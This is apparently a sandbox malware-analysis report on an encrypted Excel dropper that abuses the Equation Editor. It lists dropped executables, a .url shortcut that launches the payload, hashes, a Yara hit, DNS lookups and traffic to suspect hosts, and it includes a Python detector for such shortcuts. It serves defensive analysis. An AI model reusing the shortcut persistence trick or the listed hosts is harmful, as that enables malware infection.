                                                            Size (bytes):64
                                                            Entropy (8bit):4.060985055808161
                                                            Encrypted:false
                                                            SSDEEP:3:vpqMLJUQ2F7Sj9zWER0n:vEMWXF7wXR0n
                                                            MD5:65FC7145617D31840F0FAF6011948523
                                                            SHA1:D0BF6CD01FF08F18CBB65A43659EDE4A468494FC
                                                            SHA-256:1ADAFF33442C89AF0A9A6DB8A8F8C7C313BAEC1B4A3CED703B339233651D6D46
                                                            SHA-512:0BB7C10830BAE97DAE198F3B5F3448792D94BFA5B46BCC635BA6FA3FCF104109F4A3B3BE2CCCACC6AA3BA9BB89FB25ABE4D94CAA581F1CE5B9EB4FA638BE05AD
                                                            Malicious:false
                                                            Reputation:unknown
                                                            IE Cache URL:live.com/
                                                            Preview: wla42..live.com/.1536.1909904384.30928171.1713187734.30926839.*.
                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\SKCEWK32.txt
                                                            Process:C:\Users\user\Odhbljup.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):4.130238235582062
                                                            Encrypted:false
                                                            SSDEEP:3:vpqMLJUQ2L19zjQWiPxn:vEMWXL14xn
                                                            MD5:37B5D47F98EA3BCC813A2A012DA26F78
                                                            SHA1:80EB486A4CEE48FC96BE02E6C85F876C0DFB6285
                                                            SHA-256:670FD8BDC66132341984399409D169C956BA32A9A912997F995C210EA6DC83F9
                                                            SHA-512:58E599A14D73973A95D7A4ADB82776A58F8D16E0CFC59FBFAEBEEFBF3D33A70D99F4C055FC8F198E69499E2FA20570BA2A0082E7A1C5A7683799A6D3F2712A65
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: wla42..live.com/.1536.1759904384.30928171.1563053827.30926839.*.
                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\TMLQ6DN1.txt
                                                            Process:C:\Users\Public\vbc.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):4.11496157888382
                                                            Encrypted:false
                                                            SSDEEP:3:vpqMLJUQ2ITwdJ9zQiAR/W2Bn:vEMWXuuSiAR/W2Bn
                                                            MD5:191C207915FFCD42C751848D0D51F583
                                                            SHA1:CFD758449FF09D13B1CA44E1D27436DD3456E82D
                                                            SHA-256:7B0D70EC5CF82096B74488B579263F72425826488BC91EEC635A4AAF3D73B466
                                                            SHA-512:6EF868D388BF380C86DD8C0535986FEBFFD07454D3E905E62F1904314610BAA6EB5B927BC303A0F2BA65503D1443C3AB25EF879FF9C6D1046CF3728B9FDC2982
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: wla42..live.com/.1536.1469904384.30928171.1276742542.30926839.*.
                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ZVY3IDY2.txt
                                                            Process:C:\Users\Public\vbc.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):4.013551813326428
                                                            Encrypted:false
                                                            SSDEEP:3:vpqMLJUQ2IctuJ9znvn:vEMWXQBn
                                                            MD5:61DB77F3FE957F222F97D77038C49FBB
                                                            SHA1:6895FC3D407837B379185E80F80888E138931421
                                                            SHA-256:016D9BD79DC2CC206FD1E604F5DDC3483D963EF381D22E9DD30C52C2B97BEA5B
                                                            SHA-512:6BC6A39FE8EF6E9C3C177A42E3952D86E872C4E5C41B8FE5190F43DA42782D9D40E66E24864EF8DE83BA282427ACB5365E91C0F58EA65CA741BE30407E7938C5
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview: wla42..live.com/.1536.1499904384.30928171.1310234302.30926839.*.
                                                            C:\Users\user\Desktop\~$7009.xlsx
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):165
                                                            Entropy (8bit):1.4377382811115937
                                                            Encrypted:false
                                                            SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                            MD5:797869BB881CFBCDAC2064F92B26E46F
                                                            SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                            SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                            SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                            Malicious:true
                                                            Reputation:unknown
                                                            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                            C:\Users\user\Odhbljup.exe
                                                            Process:C:\Users\Public\vbc.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):697856
                                                            Entropy (8bit):6.715864202909051
                                                            Encrypted:false
                                                            SSDEEP:12288:CIEpAb3iVUYfqUe+L7JMlbv7fkg48BcFcePyaW:CI8G3DYfq9+hMNTMz8Cbm
                                                            MD5:3A9AE96D1F6404FCCF5BD99B7C5C0383
                                                            SHA1:2D0444EF8FE64348EEE4D748B0528E3799D18304
                                                            SHA-256:B8AA3A9C721EAE2745F1671B70869A8E3FE847A16E769D69C40727857BA54B44
                                                            SHA-512:09205202F7CAB90141485DC55C9134E4438508DD78C4484E0212708CA2782F5C8431FD8044F38718146EB9D63A6C80FCFEB1F8B8BBEA1512C859463483C9FF10
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 36%
                                                            Reputation:unknown
                                                            Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@...............................!.......f...................0..lc........................... ......................................................CODE....\........................... ..`DATA................................@...BSS......................................idata...!......."..................@....tls.....................................rdata....... ......................@..P.reloc..lc...0...d..................@..P.rsrc....f.......f...@..............@..P....................................@..P........................................................................................................................................
                                                            C:\Users\user\pujlbhdO.url
                                                            Process:C:\Users\Public\vbc.exe
                                                            File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\user\\Odhbljup.exe">), ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):77
                                                            Entropy (8bit):4.910351839735493
                                                            Encrypted:false
                                                            SSDEEP:3:HRAbABGQYmTWAX+6JwGwJPAJysGKd+Rov:HRYFVmTWD6JDwBAYsbnv
                                                            MD5:576781B47BF29FF0E3281E0DF79F44C1
                                                            SHA1:A6AC102F6E4397E9F6E5DAA395A72ED03C49B438
                                                            SHA-256:6F016734B2296FC4FC227D94D4976A43FB825F097294E3640F806482FAB6B397
                                                            SHA-512:3E33853AB8BA562B83F542A7840F4D16886FBD48E7B0DDA684B76245AFBC9CB675BF1EE87BD19466895B658158D50BB2CD176DB3165C7F8EA7E5B359AB446171
                                                            Malicious:false
                                                            Yara Hits:
                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\pujlbhdO.url, Author: @itsreallynick (Nick Carr)
                                                            Reputation:unknown
                                                            Preview: [InternetShortcut]..URL=file:"C:\\Users\\user\\Odhbljup.exe"..IconIndex=64..
                                                            C:\Users\Public\vbc.exe
                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):697856
                                                            Entropy (8bit):6.715864202909051
                                                            Encrypted:false
                                                            SSDEEP:12288:CIEpAb3iVUYfqUe+L7JMlbv7fkg48BcFcePyaW:CI8G3DYfq9+hMNTMz8Cbm
                                                            MD5:3A9AE96D1F6404FCCF5BD99B7C5C0383
                                                            SHA1:2D0444EF8FE64348EEE4D748B0528E3799D18304
                                                            SHA-256:B8AA3A9C721EAE2745F1671B70869A8E3FE847A16E769D69C40727857BA54B44
                                                            SHA-512:09205202F7CAB90141485DC55C9134E4438508DD78C4484E0212708CA2782F5C8431FD8044F38718146EB9D63A6C80FCFEB1F8B8BBEA1512C859463483C9FF10
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 36%
                                                            Reputation:unknown
                                                            Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@...............................!.......f...................0..lc........................... ......................................................CODE....\........................... ..`DATA................................@...BSS......................................idata...!......."..................@....tls.....................................rdata....... ......................@..P.reloc..lc...0...d..................@..P.rsrc....f.......f...@..............@..P....................................@..P........................................................................................................................................
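The pujlbhdO.url record above carries the only Yara hit in the dropped-file list, and its target, Odhbljup.exe, has the same SHA-256 as the vbc.exe that EQNEDT32.EXE wrote to C:\Users\Public. The Python below is an added example, not part of the Joe Sandbox report or of any vendor's tooling: it re-implements the idea behind the Methodology_Contains_Shortcut_OtherURIhandlers hit (an Internet Shortcut whose URL= uses a handler other than http/https) as a stand-alone check, resolves the file: target to a Windows path, and cross-references that path against the dropped-file hashes. The shortcut text, the benign control bookmark and the three dropped-file records are constructed inline from the values printed above; the function names, the list of extensions treated as executable and the user-writable directory prefixes are this example's own choices.

```python
"""Flag .url Internet Shortcuts whose target is a local executable and tie the
target back to a sandbox dropped-file list.

Added example; not part of the sandbox report or of any vendor's tooling.
"""
import configparser
import ntpath
import re
from typing import Dict, List, Tuple

# Constructed from the report's preview of C:\Users\user\pujlbhdO.url
# (CRLF line endings; the dropper wrote the path with doubled backslashes).
SAMPLE_URL_FILE = (
    "[InternetShortcut]\r\n"
    'URL=file:"C:\\\\Users\\\\user\\\\Odhbljup.exe"\r\n'
    "IconIndex=64\r\n"
)

# Constructed benign control: an ordinary web bookmark.
BENIGN_URL_FILE = "[InternetShortcut]\r\nURL=https://example.com/\r\n"

# (path, SHA-256, writing process) transcribed from the dropped-file records.
DROPPED_FILES: List[Tuple[str, str, str]] = [
    ("C:\\Users\\user\\Odhbljup.exe",
     "B8AA3A9C721EAE2745F1671B70869A8E3FE847A16E769D69C40727857BA54B44",
     "C:\\Users\\Public\\vbc.exe"),
    ("C:\\Users\\Public\\vbc.exe",
     "B8AA3A9C721EAE2745F1671B70869A8E3FE847A16E769D69C40727857BA54B44",
     "C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE"),
    ("C:\\Users\\user\\pujlbhdO.url",
     "6F016734B2296FC4FC227D94D4976A43FB825F097294E3640F806482FAB6B397",
     "C:\\Users\\Public\\vbc.exe"),
]

# Extension list is this example's own choice, not taken from the Yara rule.
EXECUTABLE_EXTENSIONS = {".exe", ".dll", ".scr", ".com", ".pif", ".bat", ".cmd",
                         ".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1", ".msi"}
# Locations a standard user can write to (assumed list); a shortcut target
# there is more suspicious than one under Program Files.
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def parse_url_file(text: str) -> Dict[str, str]:
    """Parse INI-style .url content; return the [InternetShortcut] keys, lower-cased."""
    # Only '=' separates keys, so the ':' inside 'file:"C:\...' stays in the value.
    parser = configparser.RawConfigParser(strict=False, delimiters=("=",))
    parser.read_string(text)  # configparser strips the \r of CRLF lines itself
    if not parser.has_section("InternetShortcut"):
        return {}
    return dict(parser.items("InternetShortcut"))


def shortcut_target(url_value: str) -> str:
    """Resolve a file: URL= value to a Windows path; '' for any other handler."""
    m = re.match(r'^file:/*"?(.*?)"?\s*$', url_value.strip(), re.IGNORECASE)
    if not m:
        return ""
    # Undo the doubled backslashes and accept forward slashes from file:///C:/ forms.
    return m.group(1).replace("\\\\", "\\").replace("/", "\\")


def assess_url_file(text: str) -> List[str]:
    """Return the reasons a shortcut looks like a local-execution stub ([] if benign)."""
    url_value = parse_url_file(text).get("url", "")
    if not url_value:
        return []
    reasons: List[str] = []
    scheme = url_value.split(":", 1)[0].lower() if ":" in url_value else ""
    if scheme not in ("http", "https"):
        reasons.append(f"non-web URI handler: {scheme or '(none)'}")
    target = shortcut_target(url_value)
    if target:
        lowered = target.lower()
        if ntpath.splitext(lowered)[1] in EXECUTABLE_EXTENSIONS:
            reasons.append(f"target is an executable: {target}")
        if lowered.startswith(USER_WRITABLE_PREFIXES):
            reasons.append("target is in a user-writable directory")
    return reasons


def same_binary_elsewhere(target: str, drops: List[Tuple[str, str, str]]) -> List[str]:
    """Other dropped paths carrying the same SHA-256 as the shortcut target."""
    hashes = {path.lower(): sha for path, sha, _ in drops}
    sha = hashes.get(target.lower())
    if sha is None:
        return []
    return [path for path, s, _ in drops if s == sha and path.lower() != target.lower()]


if __name__ == "__main__":
    for label, content in (("pujlbhdO.url", SAMPLE_URL_FILE), ("bookmark", BENIGN_URL_FILE)):
        reasons = assess_url_file(content)
        print(f"{label}: {'SUSPICIOUS' if reasons else 'ok'}")
        for r in reasons:
            print("  -", r)
    tgt = shortcut_target(parse_url_file(SAMPLE_URL_FILE)["url"])
    for other in same_binary_elsewhere(tgt, DROPPED_FILES):
        print(f"  same binary also dropped as {other}")
```

Run against the constructed records, the shortcut is flagged on all three counts (file: handler, .exe target, target under C:\Users) and the target is shown to be a byte-identical copy of the EQNEDT32-dropped vbc.exe. Where a .url like this sits decides whether it is a mere launcher or a persistence item: the report places it in the user profile root, and it says nothing about a Startup-folder copy, so the example checks the shortcut's content only and leaves location to the analyst.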

                                                            Static File Info

                                                            General

                                                            File type:CDFV2 Encrypted
                                                            Entropy (8bit):7.971035071890227
                                                            TrID:
                                                            • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                            File name:7009.xlsx
                                                            File size:234248
                                                            MD5:8305dc6702f80d7ebe34cd8c63297561
                                                            SHA1:db055cce075213d510de5ca9044ea76036dbcd07
                                                            SHA256:9eae576f7ecc05f106a7cfa605b1ca5bcd02c8d1c2c926920c0d7f0cb605b345
                                                            SHA512:4b79bcb14665fd34d42979e0364480ff2a9050d7700db3226393f5764350d3689b80431901bf275a80c60cf4d2be5e013fd2ab2de4d629a5ee826491c432b5ef
                                                            SSDEEP:6144:X4Har3eEPWQ9luDUtOh8xcx6iGWegiwrjsYLnXt:X4+TPWQ9Mx6gRiwrjrt
                                                            File Content Preview:........................>......................................................................................................................................................................................................................................

                                                            File Icon

                                                            Icon Hash:e4e2aa8aa4b4bcb4

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Dec 2, 2021 19:33:54.980304003 CET | 49167 | 80 | 192.168.2.22 | 13.250.31.113
                                                            Dec 2, 2021 19:33:55.143192053 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.143338919 CET | 49167 | 80 | 192.168.2.22 | 13.250.31.113
                                                            Dec 2, 2021 19:33:55.143656969 CET | 49167 | 80 | 192.168.2.22 | 13.250.31.113
                                                            Dec 2, 2021 19:33:55.306956053 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.306991100 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.307003021 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.307015896 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.307177067 CET | 49167 | 80 | 192.168.2.22 | 13.250.31.113
                                                            Dec 2, 2021 19:33:55.469924927 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.469961882 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.469979048 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.469995022 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.470011950 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.470026970 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.470042944 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.470058918 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.470092058 CET | 49167 | 80 | 192.168.2.22 | 13.250.31.113
                                                            Dec 2, 2021 19:33:55.470133066 CET | 49167 | 80 | 192.168.2.22 | 13.250.31.113
                                                            Dec 2, 2021 19:33:55.470135927 CET | 49167 | 80 | 192.168.2.22 | 13.250.31.113
                                                            Dec 2, 2021 19:33:55.632994890 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.633028984 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.633042097 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.633054018 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.633073092 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.633094072 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.633130074 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.633151054 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.633171082 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.633191109 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.633209944 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.633222103 CET | 49167 | 80 | 192.168.2.22 | 13.250.31.113
                                                            Dec 2, 2021 19:33:55.633229017 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.633249998 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.633260012 CET | 49167 | 80 | 192.168.2.22 | 13.250.31.113
                                                            Dec 2, 2021 19:33:55.633263111 CET | 49167 | 80 | 192.168.2.22 | 13.250.31.113
                                                            Dec 2, 2021 19:33:55.633270025 CET | 49167 | 80 | 192.168.2.22 | 13.250.31.113
                                                            Dec 2, 2021 19:33:55.633271933 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.633284092 CET | 49167 | 80 | 192.168.2.22 | 13.250.31.113
                                                            Dec 2, 2021 19:33:55.633301020 CET | 49167 | 80 | 192.168.2.22 | 13.250.31.113
                                                            Dec 2, 2021 19:33:55.633712053 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.633738995 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.633768082 CET | 49167 | 80 | 192.168.2.22 | 13.250.31.113
                                                            Dec 2, 2021 19:33:55.633779049 CET | 49167 | 80 | 192.168.2.22 | 13.250.31.113
                                                            Dec 2, 2021 19:33:55.636750937 CET | 49167 | 80 | 192.168.2.22 | 13.250.31.113
                                                            Dec 2, 2021 19:33:55.796210051 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.796266079 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.796293974 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.796330929 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.796366930 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.796400070 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.796428919 CET | 49167 | 80 | 192.168.2.22 | 13.250.31.113
                                                            Dec 2, 2021 19:33:55.796435118 CET | 80 | 49167 | 13.250.31.113 | 192.168.2.22
                                                            Dec 2, 2021 19:33:55.796468973 CET | 49167 | 80 | 192.168.2.22 | 13.250.31.113
                                                            Dec 2, 2021 19:33:55.796472073 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796473026 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796519041 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796521902 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796555042 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796555996 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796588898 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796590090 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796626091 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796627045 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796660900 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796664953 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796698093 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796700001 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796734095 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796736002 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796768904 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796772003 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796803951 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796807051 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796838999 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796843052 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796911001 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796925068 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796962023 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796972990 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.796998024 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.796998978 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.797036886 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.797038078 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.797072887 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.797074080 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.797106981 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.797111034 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.797144890 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.797147989 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.797178984 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.797180891 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.797218084 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.797218084 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.797254086 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.797257900 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.797288895 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.797290087 CET804916713.250.31.113192.168.2.22
                                                            Dec 2, 2021 19:33:55.797322989 CET4916780192.168.2.2213.250.31.113
                                                            Dec 2, 2021 19:33:55.797326088 CET804916713.250.31.113192.168.2.22

                                                            UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 2, 2021 19:34:02.982615948 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Dec 2, 2021 19:34:04.865891933 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Dec 2, 2021 19:34:31.759788990 CET | 57805 | 53 | 192.168.2.22 | 8.8.8.8
Dec 2, 2021 19:34:33.459217072 CET | 59030 | 53 | 192.168.2.22 | 8.8.8.8
Dec 2, 2021 19:34:43.621721983 CET | 59185 | 53 | 192.168.2.22 | 8.8.8.8
Dec 2, 2021 19:34:45.487137079 CET | 55616 | 53 | 192.168.2.22 | 8.8.8.8
Dec 2, 2021 19:35:29.476387978 CET | 49972 | 53 | 192.168.2.22 | 8.8.8.8
Dec 2, 2021 19:35:29.516741037 CET | 53 | 49972 | 8.8.8.8 | 192.168.2.22
Dec 2, 2021 19:35:39.601691008 CET | 51771 | 53 | 192.168.2.22 | 8.8.8.8
Dec 2, 2021 19:35:39.997900963 CET | 53 | 51771 | 8.8.8.8 | 192.168.2.22

                                                            DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Dec 2, 2021 19:34:02.982615948 CET | 192.168.2.22 | 8.8.8.8 | 0xac1c | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
Dec 2, 2021 19:34:04.865891933 CET | 192.168.2.22 | 8.8.8.8 | 0x85f5 | Standard query (0) | prigmg.am.files.1drv.com | A (IP address) | IN (0x0001)
Dec 2, 2021 19:34:31.759788990 CET | 192.168.2.22 | 8.8.8.8 | 0x5b9b | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
Dec 2, 2021 19:34:33.459217072 CET | 192.168.2.22 | 8.8.8.8 | 0x3d6f | Standard query (0) | prigmg.am.files.1drv.com | A (IP address) | IN (0x0001)
Dec 2, 2021 19:34:43.621721983 CET | 192.168.2.22 | 8.8.8.8 | 0x6b7d | Standard query (0) | onedrive.live.com | A (IP address) | IN (0x0001)
Dec 2, 2021 19:34:45.487137079 CET | 192.168.2.22 | 8.8.8.8 | 0x984c | Standard query (0) | prigmg.am.files.1drv.com | A (IP address) | IN (0x0001)
Dec 2, 2021 19:35:29.476387978 CET | 192.168.2.22 | 8.8.8.8 | 0x8eb8 | Standard query (0) | www.urzeczenie.com | A (IP address) | IN (0x0001)
Dec 2, 2021 19:35:39.601691008 CET | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.voucheraja.com | A (IP address) | IN (0x0001)

                                                            DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Dec 2, 2021 19:34:03.014826059 CET | 8.8.8.8 | 192.168.2.22 | 0xac1c | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
Dec 2, 2021 19:34:04.920044899 CET | 8.8.8.8 | 192.168.2.22 | 0x85f5 | No error (0) | prigmg.am.files.1drv.com | am-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001)
Dec 2, 2021 19:34:04.920044899 CET | 8.8.8.8 | 192.168.2.22 | 0x85f5 | No error (0) | am-files.fe.1drv.com | odc-am-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
Dec 2, 2021 19:34:31.788798094 CET | 8.8.8.8 | 192.168.2.22 | 0x5b9b | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
Dec 2, 2021 19:34:34.308892965 CET | 8.8.8.8 | 192.168.2.22 | 0x3d6f | No error (0) | prigmg.am.files.1drv.com | am-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001)
Dec 2, 2021 19:34:34.308892965 CET | 8.8.8.8 | 192.168.2.22 | 0x3d6f | No error (0) | am-files.fe.1drv.com | odc-am-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
Dec 2, 2021 19:34:43.643333912 CET | 8.8.8.8 | 192.168.2.22 | 0x6b7d | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
Dec 2, 2021 19:34:45.507133007 CET | 8.8.8.8 | 192.168.2.22 | 0x984c | No error (0) | prigmg.am.files.1drv.com | am-files.fe.1drv.com | | CNAME (Canonical name) | IN (0x0001)
Dec 2, 2021 19:34:45.507133007 CET | 8.8.8.8 | 192.168.2.22 | 0x984c | No error (0) | am-files.fe.1drv.com | odc-am-files-geo.onedrive.akadns.net | | CNAME (Canonical name) | IN (0x0001)
Dec 2, 2021 19:35:29.516741037 CET | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | www.urzeczenie.com | urzeczenie.com | | CNAME (Canonical name) | IN (0x0001)
Dec 2, 2021 19:35:29.516741037 CET | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | urzeczenie.com | | 87.98.234.164 | A (IP address) | IN (0x0001)
Dec 2, 2021 19:35:39.997900963 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | www.voucheraja.com | voucheraja.com | | CNAME (Canonical name) | IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • 13.250.31.113
                                                            • www.urzeczenie.com

                                                            HTTP Packets

